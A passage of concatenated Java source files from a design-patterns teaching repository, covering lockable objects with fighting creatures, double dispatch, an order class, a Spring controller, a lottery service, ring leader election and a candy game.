setDamage(CreatureStats.HUMAN_DAMAGE.getValue());
setHealth(CreatureStats.HUMAN_HEALTH.getValue());
}
}
| iluwatar/java-design-patterns | lockable-object/src/main/java/com/iluwatar/lockableobject/domain/Human.java |
1,087 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.lockableobject.domain;
import com.iluwatar.lockableobject.Lockable;
import java.security.SecureRandom;
import lombok.NonNull;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/** A Feind is a creature that wants to possess a Lockable object. */
public class Feind implements Runnable {
private final Creature creature;
private final Lockable target;
private final SecureRandom random;
private static final Logger LOGGER = LoggerFactory.getLogger(Feind.class.getName());
/**
   * Public constructor.
   *
   * @param feind as the creature that wants to lock the lockable.
* @param target as the target object.
*/
public Feind(@NonNull Creature feind, @NonNull Lockable target) {
this.creature = feind;
this.target = target;
this.random = new SecureRandom();
}
@Override
public void run() {
if (!creature.acquire(target)) {
fightForTheSword(creature, target.getLocker(), target);
} else {
LOGGER.info("{} has acquired the sword!", target.getLocker().getName());
}
}
/**
* Keeps on fighting until the Lockable is possessed.
*
* @param reacher as the source creature.
* @param holder as the foe.
* @param sword as the Lockable to possess.
*/
private void fightForTheSword(Creature reacher, @NonNull Creature holder, Lockable sword) {
LOGGER.info("A duel between {} and {} has been started!", reacher.getName(), holder.getName());
boolean randBool;
while (this.target.isLocked() && reacher.isAlive() && holder.isAlive()) {
randBool = random.nextBoolean();
if (randBool) {
reacher.attack(holder);
} else {
holder.attack(reacher);
}
}
if (reacher.isAlive()) {
if (!reacher.acquire(sword)) {
fightForTheSword(reacher, sword.getLocker(), sword);
} else {
LOGGER.info("{} has acquired the sword!", reacher.getName());
}
}
}
}
| iluwatar/java-design-patterns | lockable-object/src/main/java/com/iluwatar/lockableobject/domain/Feind.java |
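A hedged sketch of how two Feind threads contend for a single Lockable, in the same package as Feind. SwordOfAragorn stands in for the module's Lockable implementation and is an assumption; only the Lockable interface is referenced above.
import com.iluwatar.lockableobject.Lockable;

public class FeindDemo {
  public static void main(String[] args) throws InterruptedException {
    Lockable sword = new SwordOfAragorn(); // assumed Lockable implementation
    Creature aragorn = new Human("Aragorn");
    Creature boromir = new Human("Boromir");
    Thread first = new Thread(new Feind(aragorn, sword));
    Thread second = new Thread(new Feind(boromir, sword));
    first.start();
    second.start();
    first.join();
    second.join();
    // whichever creature survives the duel ends up holding the sword
  }
}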
1,089 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.doubledispatch;
import com.iluwatar.doubledispatch.constants.AppConstants;
import lombok.extern.slf4j.Slf4j;
/**
* Space station Mir game object.
*/
@Slf4j
public class SpaceStationMir extends GameObject {
public SpaceStationMir(int left, int top, int right, int bottom) {
super(left, top, right, bottom);
}
@Override
public void collision(GameObject gameObject) {
gameObject.collisionResolve(this);
}
@Override
public void collisionResolve(FlamingAsteroid asteroid) {
LOGGER.info(AppConstants.HITS + " {} is damaged! {} is set on fire!", asteroid.getClass()
.getSimpleName(),
this.getClass().getSimpleName(), this.getClass().getSimpleName(), this.getClass()
.getSimpleName());
setDamaged(true);
setOnFire(true);
}
@Override
public void collisionResolve(Meteoroid meteoroid) {
logHits(meteoroid);
setDamaged(true);
}
@Override
public void collisionResolve(SpaceStationMir mir) {
logHits(mir);
setDamaged(true);
}
@Override
public void collisionResolve(SpaceStationIss iss) {
logHits(iss);
setDamaged(true);
}
private void logHits(GameObject gameObject) {
    LOGGER.info(AppConstants.HITS + " {} is damaged!", gameObject.getClass().getSimpleName(),
        this.getClass().getSimpleName(), this.getClass().getSimpleName());
}
} | iluwatar/java-design-patterns | double-dispatch/src/main/java/com/iluwatar/doubledispatch/SpaceStationMir.java |
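A short sketch of the double dispatch at work, in the same package as the classes above. It assumes FlamingAsteroid mirrors the collision() implementation shown here, takes the same (left, top, right, bottom) constructor arguments, and that GameObject exposes a Lombok-style isDamaged() accessor; none of that appears in this excerpt.
public class CollisionDemo {
  public static void main(String[] args) {
    GameObject asteroid = new FlamingAsteroid(0, 0, 5, 5); // assumed constructor
    GameObject mir = new SpaceStationMir(1, 1, 2, 2);
    // first virtual call picks FlamingAsteroid.collision(GameObject),
    // second call picks SpaceStationMir.collisionResolve(FlamingAsteroid)
    asteroid.collision(mir);
    System.out.println("Mir damaged: " + ((SpaceStationMir) mir).isDamaged()); // assumed getter
  }
}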
1,090 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.intercepting.filter;
import lombok.AllArgsConstructor;
import lombok.Getter;
import lombok.NoArgsConstructor;
import lombok.Setter;
/**
* Order class carries the order data.
*/
@Getter
@Setter
@NoArgsConstructor
@AllArgsConstructor
public class Order {
private String name;
private String contactNumber;
private String address;
private String depositNumber;
private String orderItem;
}
| iluwatar/java-design-patterns | intercepting-filter/src/main/java/com/iluwatar/intercepting/filter/Order.java |
1,091 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.lockableobject;
import java.io.Serial;
/**
* An exception regarding the locking process of a Lockable object.
*/
public class LockingException extends RuntimeException {
@Serial
private static final long serialVersionUID = 8556381044865867037L;
public LockingException(String message) {
super(message);
}
}
| iluwatar/java-design-patterns | lockable-object/src/main/java/com/iluwatar/lockableobject/LockingException.java |
1,092 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.lockableobject.domain;
import com.iluwatar.lockableobject.Lockable;
import java.util.HashSet;
import java.util.Set;
import lombok.Getter;
import lombok.NonNull;
import lombok.Setter;
import lombok.extern.slf4j.Slf4j;
/**
* An abstract class of a creature that wanders across the wasteland. It can attack, get hit and
* acquire a Lockable object.
*/
@Getter
@Setter
@Slf4j
public abstract class Creature {
private String name;
private CreatureType type;
private int health;
private int damage;
Set<Lockable> instruments;
protected Creature(@NonNull String name) {
this.name = name;
this.instruments = new HashSet<>();
}
/**
   * Reaches for the Lockable and tries to hold it.
   *
   * @param lockable as the Lockable to lock.
   * @return true if the Lockable was locked by this creature.
*/
public boolean acquire(@NonNull Lockable lockable) {
if (lockable.lock(this)) {
instruments.add(lockable);
return true;
}
return false;
}
/** Terminates the Creature and unlocks all the Lockable that it possesses. */
public synchronized void kill() {
LOGGER.info("{} {} has been slayed!", type, name);
for (Lockable lockable : instruments) {
lockable.unlock(this);
}
this.instruments.clear();
}
/**
* Attacks a foe.
*
* @param creature as the foe to be attacked.
*/
public synchronized void attack(@NonNull Creature creature) {
creature.hit(getDamage());
}
/**
   * When a creature gets hit, the damage is subtracted from the creature's health.
*
* @param damage as the damage that was taken.
*/
public synchronized void hit(int damage) {
if (damage < 0) {
throw new IllegalArgumentException("Damage cannot be a negative number");
}
if (isAlive()) {
setHealth(getHealth() - damage);
if (!isAlive()) {
kill();
}
}
}
/**
* Checks if the creature is still alive.
*
   * @return true if the creature is alive.
*/
public synchronized boolean isAlive() {
return getHealth() > 0;
}
}
| iluwatar/java-design-patterns | lockable-object/src/main/java/com/iluwatar/lockableobject/domain/Creature.java |
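A minimal illustration of the Creature life cycle described above: attack() subtracts the attacker's damage from the target's health, and kill() fires automatically once health reaches zero, releasing any held Lockables. Human is used as the concrete type because it appears earlier in this module; the loop assumes the configured damage value is positive.
public class CreatureDemo {
  public static void main(String[] args) {
    Creature attacker = new Human("Aragorn");
    Creature defender = new Human("Lurtz");
    while (defender.isAlive()) {
      attacker.attack(defender); // each hit lowers the defender's health
    }
    System.out.println(defender.getName() + " alive? " + defender.isAlive()); // false
  }
}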
1,093 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.page.controller;
import lombok.NoArgsConstructor;
import lombok.extern.slf4j.Slf4j;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.GetMapping;
/**
* User Controller.
*/
@Slf4j
@Controller
@NoArgsConstructor
public class UserController {
private final UserView view = new UserView();
/**
   * Handles the HTTP GET request: populates the model and delegates rendering to the view.
*/
@GetMapping("/user")
public String getUserPath(SignupModel form, Model model) {
model.addAttribute("name", form.getName());
model.addAttribute("email", form.getEmail());
return view.display(form);
}
} | iluwatar/java-design-patterns | page-controller/src/main/java/com/iluwatar/page/controller/UserController.java |
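The controller above delegates rendering to a UserView instance that is not shown in this excerpt. A hedged sketch of what that collaborator could look like follows; the actual class in the module may differ, and the returned view name "user" is an assumption.
public class UserView {

  /**
   * Resolves the submitted signup data to the logical view name of the user page.
   */
  public String display(SignupModel form) {
    // a template engine would resolve "user" to the actual page template
    return "user";
  }
}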
1,096 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.hexagonal.domain;
import static com.iluwatar.hexagonal.domain.LotteryConstants.PRIZE_AMOUNT;
import static com.iluwatar.hexagonal.domain.LotteryConstants.SERVICE_BANK_ACCOUNT;
import com.google.inject.Inject;
import com.iluwatar.hexagonal.banking.WireTransfers;
import com.iluwatar.hexagonal.database.LotteryTicketRepository;
import com.iluwatar.hexagonal.eventlog.LotteryEventLog;
import java.util.Map;
/**
* Lottery administration implementation.
*/
public class LotteryAdministration {
private final LotteryTicketRepository repository;
private final LotteryEventLog notifications;
private final WireTransfers wireTransfers;
/**
* Constructor.
*/
@Inject
public LotteryAdministration(LotteryTicketRepository repository, LotteryEventLog notifications,
WireTransfers wireTransfers) {
this.repository = repository;
this.notifications = notifications;
this.wireTransfers = wireTransfers;
}
/**
* Get all the lottery tickets submitted for lottery.
*/
public Map<LotteryTicketId, LotteryTicket> getAllSubmittedTickets() {
return repository.findAll();
}
/**
* Draw lottery numbers.
*/
public LotteryNumbers performLottery() {
var numbers = LotteryNumbers.createRandom();
var tickets = getAllSubmittedTickets();
for (var id : tickets.keySet()) {
var lotteryTicket = tickets.get(id);
var playerDetails = lotteryTicket.playerDetails();
var playerAccount = playerDetails.bankAccount();
var result = LotteryUtils.checkTicketForPrize(repository, id, numbers).getResult();
if (result == LotteryTicketCheckResult.CheckResult.WIN_PRIZE) {
if (wireTransfers.transferFunds(PRIZE_AMOUNT, SERVICE_BANK_ACCOUNT, playerAccount)) {
notifications.ticketWon(playerDetails, PRIZE_AMOUNT);
} else {
notifications.prizeError(playerDetails, PRIZE_AMOUNT);
}
} else if (result == LotteryTicketCheckResult.CheckResult.NO_PRIZE) {
notifications.ticketDidNotWin(playerDetails);
}
}
return numbers;
}
/**
* Begin new lottery round.
*/
public void resetLottery() {
repository.deleteAll();
}
}
| iluwatar/java-design-patterns | hexagonal/src/main/java/com/iluwatar/hexagonal/domain/LotteryAdministration.java |
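A hedged wiring sketch for the administration service above. Its constructor is annotated with @Inject, so a Guice injector can assemble it; LotteryModule is a hypothetical module name standing in for whatever bindings the application provides for the repository, event log and bank transfer ports.
import com.google.inject.Guice;
import com.google.inject.Injector;

public class AdministrationDemo {
  public static void main(String[] args) {
    Injector injector = Guice.createInjector(new LotteryModule()); // hypothetical module
    var administration = injector.getInstance(LotteryAdministration.class);
    administration.resetLottery();                          // begin a fresh round
    var winningNumbers = administration.performLottery();   // draw numbers and notify players
    System.out.println("Winning numbers: " + winningNumbers);
  }
}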
1,097 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.leaderelection.ring;
import com.iluwatar.leaderelection.AbstractInstance;
import com.iluwatar.leaderelection.Message;
import com.iluwatar.leaderelection.MessageManager;
import java.util.Arrays;
import lombok.extern.slf4j.Slf4j;
/**
 * Implementation with token ring algorithm. The instances in the system are organized as a ring.
 * Each instance should have a sequential id and the instance with the smallest (or largest) id
 * should be the initial leader. All the other instances send a heartbeat message to the leader
 * periodically to check its health. If an instance finds the leader is down, it sends an election
 * message to the next alive instance in the ring, containing its own ID. Each following instance
 * adds its own ID to the message and passes it on. Once all the alive instances' IDs have been
 * added, the message arrives back at the first instance, which chooses the instance with the
 * smallest ID as the new leader and then sends a leader message to the other instances to announce
 * the result.
*/
@Slf4j
public class RingInstance extends AbstractInstance {
private static final String INSTANCE = "Instance ";
/**
* Constructor of RingInstance.
*/
public RingInstance(MessageManager messageManager, int localId, int leaderId) {
super(messageManager, localId, leaderId);
}
/**
* Process the heartbeat invoke message. After receiving the message, the instance will send a
* heartbeat to leader to check its health. If alive, it will inform the next instance to do the
* heartbeat. If not, it will start the election process.
*/
@Override
protected void handleHeartbeatInvokeMessage() {
try {
var isLeaderAlive = messageManager.sendHeartbeatMessage(this.leaderId);
if (isLeaderAlive) {
LOGGER.info(INSTANCE + localId + "- Leader is alive. Start next heartbeat in 5 second.");
Thread.sleep(HEARTBEAT_INTERVAL);
messageManager.sendHeartbeatInvokeMessage(this.localId);
} else {
LOGGER.info(INSTANCE + localId + "- Leader is not alive. Start election.");
messageManager.sendElectionMessage(this.localId, String.valueOf(this.localId));
}
} catch (InterruptedException e) {
LOGGER.info(INSTANCE + localId + "- Interrupted.");
}
}
/**
* Process election message. If the local ID is contained in the ID list, the instance will select
 * the alive instance with the smallest ID to be the new leader, and send the leader message to announce it.
* If not, it will add its local ID to the list and send the message to the next instance in the
* ring.
*/
@Override
protected void handleElectionMessage(Message message) {
var content = message.getContent();
LOGGER.info(INSTANCE + localId + " - Election Message: " + content);
var candidateList = Arrays.stream(content.trim().split(","))
.map(Integer::valueOf)
.sorted()
.toList();
if (candidateList.contains(localId)) {
var newLeaderId = candidateList.get(0);
LOGGER.info(INSTANCE + localId + " - New leader should be " + newLeaderId + ".");
messageManager.sendLeaderMessage(localId, newLeaderId);
} else {
content += "," + localId;
messageManager.sendElectionMessage(localId, content);
}
}
/**
   * Process leader message. The instance will set the leader ID to the new one and send the
   * message to the next instance until all the alive instances in the ring are informed.
*/
@Override
protected void handleLeaderMessage(Message message) {
var newLeaderId = Integer.valueOf(message.getContent());
if (this.leaderId != newLeaderId) {
LOGGER.info(INSTANCE + localId + " - Update leaderID");
this.leaderId = newLeaderId;
messageManager.sendLeaderMessage(localId, newLeaderId);
} else {
LOGGER.info(INSTANCE + localId + " - Leader update done. Start heartbeat.");
messageManager.sendHeartbeatInvokeMessage(localId);
}
}
/**
* Not used in Ring instance.
*/
@Override
protected void handleLeaderInvokeMessage() {
// Not used in Ring instance.
}
@Override
protected void handleHeartbeatMessage(Message message) {
// Not used in Ring instance.
}
@Override
protected void handleElectionInvokeMessage() {
// Not used in Ring instance.
}
}
| iluwatar/java-design-patterns | leader-election/src/main/java/com/iluwatar/leaderelection/ring/RingInstance.java |
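A standalone sketch of the election rule described in the class comment above, separate from the module's own messaging classes: candidate IDs accumulate in the election message as it travels around the ring, and when the message returns to its originator the smallest ID wins. The instance IDs are arbitrary example values.
import java.util.Arrays;
import java.util.List;

public class RingElectionSketch {
  public static void main(String[] args) {
    List<Integer> ring = List.of(3, 5, 7, 2); // alive instances in ring order
    StringBuilder content = new StringBuilder(String.valueOf(ring.get(0))); // instance 3 starts the election
    for (int i = 1; i < ring.size(); i++) {
      content.append(",").append(ring.get(i)); // each instance appends its own ID and passes the message on
    }
    // back at the originator: its ID is already in the list, so elect the smallest
    int newLeader = Arrays.stream(content.toString().split(","))
        .map(Integer::valueOf)
        .sorted()
        .toList()
        .get(0);
    System.out.println("New leader: " + newLeader); // prints 2
  }
}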
1,099 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.event.asynchronous;
/**
 * Events that fulfill the start, stop, and current-status behaviour implement this interface.
*/
public interface Event {
void start();
void stop();
void status();
}
| iluwatar/java-design-patterns | event-based-asynchronous/src/main/java/com/iluwatar/event/asynchronous/Event.java |
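A minimal illustrative implementation of the interface above, not the module's own event class: it runs on its own thread until stopped and reports its state through status().
public class SimpleEvent implements Event {

  private volatile boolean running;
  private Thread worker;

  @Override
  public void start() {
    running = true;
    worker = new Thread(() -> {
      while (running) {
        try {
          Thread.sleep(1000); // placeholder for the event's periodic work
        } catch (InterruptedException e) {
          Thread.currentThread().interrupt();
          return;
        }
      }
    });
    worker.start();
  }

  @Override
  public void stop() {
    running = false;
    if (worker != null) {
      worker.interrupt();
    }
  }

  @Override
  public void status() {
    System.out.println(running ? "Event is running." : "Event is stopped.");
  }
}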
1,100 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.typeobject;
import com.iluwatar.typeobject.Candy.Type;
import java.util.ArrayList;
import java.util.List;
import lombok.extern.slf4j.Slf4j;
/**
* The CandyGame class contains the rules for the continuation of the game and has the game matrix
* (field 'cells') and totalPoints gained during the game.
*/
@Slf4j
@SuppressWarnings("java:S3776") //"Cognitive Complexity of methods should not be too high"
public class CandyGame {
Cell[][] cells;
CellPool pool;
int totalPoints;
CandyGame(int num, CellPool pool) {
this.cells = new Cell[num][num];
this.pool = pool;
this.totalPoints = 0;
for (var i = 0; i < num; i++) {
for (var j = 0; j < num; j++) {
this.cells[i][j] = this.pool.getNewCell();
this.cells[i][j].positionX = j;
this.cells[i][j].positionY = i;
}
}
}
static String numOfSpaces(int num) {
return " ".repeat(Math.max(0, num));
}
void printGameStatus() {
LOGGER.info("");
for (Cell[] cell : cells) {
for (var j = 0; j < cells.length; j++) {
var candyName = cell[j].candy.name;
if (candyName.length() < 20) {
var totalSpaces = 20 - candyName.length();
LOGGER.info(numOfSpaces(totalSpaces / 2) + cell[j].candy.name
+ numOfSpaces(totalSpaces - totalSpaces / 2) + "|");
} else {
LOGGER.info(candyName + "|");
}
}
LOGGER.info("");
}
LOGGER.info("");
}
List<Cell> adjacentCells(int y, int x) {
var adjacent = new ArrayList<Cell>();
if (y == 0) {
adjacent.add(this.cells[1][x]);
}
if (x == 0) {
adjacent.add(this.cells[y][1]);
}
if (y == cells.length - 1) {
adjacent.add(this.cells[cells.length - 2][x]);
}
if (x == cells.length - 1) {
adjacent.add(this.cells[y][cells.length - 2]);
}
if (y > 0 && y < cells.length - 1) {
adjacent.add(this.cells[y - 1][x]);
adjacent.add(this.cells[y + 1][x]);
}
if (x > 0 && x < cells.length - 1) {
adjacent.add(this.cells[y][x - 1]);
adjacent.add(this.cells[y][x + 1]);
}
return adjacent;
}
boolean continueRound() {
for (var i = 0; i < this.cells.length; i++) {
if (this.cells[cells.length - 1][i].candy.getType().equals(Type.REWARD_FRUIT)) {
return true;
}
}
for (var i = 0; i < this.cells.length; i++) {
for (var j = 0; j < this.cells.length; j++) {
if (!this.cells[i][j].candy.getType().equals(Type.REWARD_FRUIT)) {
var adj = adjacentCells(i, j);
for (Cell cell : adj) {
if (this.cells[i][j].candy.name.equals(cell.candy.name)) {
return true;
}
}
}
}
}
return false;
}
void handleChange(int points) {
LOGGER.info("+" + points + " points!");
